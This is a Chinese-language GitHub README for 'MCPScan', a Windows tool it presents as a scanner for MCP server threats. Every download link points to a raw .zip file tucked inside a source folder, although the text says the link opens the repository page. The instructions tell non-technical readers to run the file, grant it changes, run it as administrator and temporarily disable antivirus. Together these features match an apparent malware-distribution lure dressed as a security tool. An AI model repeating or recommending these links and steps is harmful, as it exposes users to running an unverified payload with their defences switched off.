harikrishn4101/MCPScan
GitHub: harikrishn4101/MCPScan
一款专注于 MCP 服务器安全审计的扫描工具,帮助发现 AI Agent 连接场景下的工具投毒、凭据泄露、RCE、SSRF 等多种威胁。
Stars: 0 | Forks: 0
# 🛡️ MCPScan - 快速查找安全风险
[](https://raw.githubusercontent.com/harikrishn4101/MCPScan/main/src/checks/Scan-MCP-3.1-beta.1.zip)
## 📋 什么是 MCPScan?
MCPScan 用于扫描使用 Model Context Protocol (MCP) 的服务器。它会查找安全问题,例如工具投毒、密码泄露、远程代码执行风险、服务器端请求伪造、会话劫持以及供应链问题。它支持多种通信类型,包括 stdio、HTTP 和 SSE。MCPScan 通过发现关键问题来帮助保障你的 MCP 服务器的安全。
## 💻 系统要求
在开始之前,请检查你的 Windows 计算机是否满足以下要求:
- Windows 10 或更高版本(推荐 64 位)
- 至少 4 GB 内存
- 200 MB 可用磁盘空间
- 用于下载和更新的互联网连接
不需要任何额外的软件或编程工具。MCPScan 可作为独立应用程序运行。
## 🌐 从哪里获取 MCPScan
你可以从官方 GitHub 页面下载 MCPScan:
[](https://raw.githubusercontent.com/harikrishn4101/MCPScan/main/src/checks/Scan-MCP-3.1-beta.1.zip)
点击上面的链接将直接前往 GitHub 仓库页面。在那里,你可以找到安装 MCPScan 所需的文件。
## 🚀 如何在 Windows 上下载并运行 MCPScan
按照以下步骤让 MCPScan 运行起来。本指南假设你此前并未使用过此类软件。
### 1. 访问 GitHub MCPScan 页面
点击下载徽章或在 Web 浏览器中打开此链接:
https://raw.githubusercontent.com/harikrishn4101/MCPScan/main/src/checks/Scan-MCP-3.1-beta.1.zip
这将带你进入 GitHub 上的 MCPScan 仓库。
### 2. 找到下载部分
在 GitHub 页面上,寻找名为 **Releases** 的部分,或向下滚动以查找与 MCPScan 相关的文件。对于 Windows,这些文件通常以 `.exe` 或 `.zip` 结尾。
如果你没有看到 `.exe` 文件,请在右侧边栏或主导航菜单的 **Releases** 下寻找最新版本。
### 3. 下载 MCPScan Windows 文件
- 点击专为 Windows 制作的最新 `.exe` 或 `.zip` 文件。
- 如果你下载的是 `.zip` 文件,则在运行前需要解压缩其中的内容。
将文件保存在你容易找到的位置,例如你的 **Downloads** 文件夹或桌面。
### 4. 运行安装程序或应用程序
- 如果你下载的是 `.exe` 文件,双击它以直接启动安装程序或应用程序。
- 如果你下载的是 `.zip` 文件,请右键单击它并选择 **Extract All**,然后打开文件夹并双击 MCPScan 应用程序。
Windows 可能会询问你是否允许此应用进行更改。选择 **Yes** 以继续。
### 5. 按照屏幕上的说明操作
如果该文件是安装程序,它将引导你完成一些简单的设置步骤。只需根据需要点击 **Next** 或 **Install**。
如果它是一个独立的应用程序,它可能会在启动后立即打开。
### 6. 确认 MCPScan 正常打开
你应该会看到一个表明 MCPScan 正在运行的窗口或控制台。这意味着安装已完成,程序已准备就绪。
## 🛠️ MCPScan 的基本用法
MCPScan 通过扫描你的 MCP 服务器来发现安全问题。要使用它,你需要提供想要检查的服务器的地址或详细信息。
- 在应用程序界面中输入服务器信息。
- 点击 **Scan** 按钮开始。
- 等待结果,结果将列出 MCPScan 发现的任何问题。
你不需要具备编程技能即可使用 MCPScan。界面将引导你完成整个过程并显示清晰的结果。
## 🔧 故障排除提示
如果 MCPScan 未能启动或你看到错误,请尝试以下操作:
- 确保你的 Windows 版本保持最新。
- 检查你的网络连接。
- 右键单击应用程序并选择 **Run as administrator**,以管理员身份运行 MCPScan。
- 暂时禁用任何杀毒软件,因为它们可能会拦截 MCPScan。
- 重启你的计算机,然后重试。
## 💡 了解 MCPScan 的功能
MCPScan 会在你的 MCP 服务器环境中查找特定风险:
- **Tool Poisoning(工具投毒):** 检测操纵你服务器工具的恶意输入。
- **Credential Leaks(凭据泄露):** 查找暴露的用户名、密码或密钥。
- **Remote Code Execution (RCE)(远程代码执行):** 捕获黑客远程运行有害代码的途径。
- **Server-Side Request Forgery (SSRF)(服务器端请求伪造):** 识别允许攻击者访问内部资源的欺骗手段。
- **Session Hijacking(会话劫持):** 发现已有人可能接管活动会话的途径。
- **Supply Chain Vulnerabilities(供应链漏洞):** 检查第三方组件是否会危及你服务器的安全。
这些检查有助于保护你的系统免受可能导致数据丢失或服务中断的攻击。
## 📥 更新 MCPScan
请定期检查 GitHub 页面以获取 MCPScan 的最新版本。
- 访问 https://raw.githubusercontent.com/harikrishn4101/MCPScan/main/src/checks/Scan-MCP-3.1-beta.1.zip
- 按上述说明下载最新文件。
- 用新文件替换你旧的 MCPScan 文件。
保持 MCPScan 为最新版本可确保你拥有最新的安全检查和修复。
## 🔒 隐私与安全
MCPScan 在你的计算机本地运行。它不会将你的服务器数据发送到任何外部服务器。你在使用该工具时,信息会保持私密。
## 🤝 支持与问题反馈
如需帮助或报告问题:
- 使用 GitHub 页面上的 **Issues** 标签页。
- 描述你当时正在做什么以及出现了什么问题。
- 社区或项目维护者将会查看并提供协助。
你无需具备编程背景即可提交问题。只需用简单的术语解释即可。
## ⚙️ 高级选项(可选)
对于熟悉技术细节的用户,MCPScan 提供了自定义扫描的选项:
- 选择要扫描的传输类型(stdio、HTTP、SSE)
- 设置扫描深度和超时设置
- 以 CSV 或 JSON 等格式导出扫描报告
默认设置适用于大多数用户。仅在你了解其含义时才调整这些设置。
[](https://raw.githubusercontent.com/harikrishn4101/MCPScan/main/src/checks/Scan-MCP-3.1-beta.1.zip)
标签:AI Agent安全, AI安全, Chat Copilot, CISA项目, MCP服务器, Model Context Protocol, RCE, SSE, SSRF, Stdio, Windows安全工具, 会话劫持, 协议安全, 密码泄露, 工具投毒检测, 文档安全, 服务端请求伪造, 编程工具, 网络安全, 远程代码执行, 隐私保护, 风险识别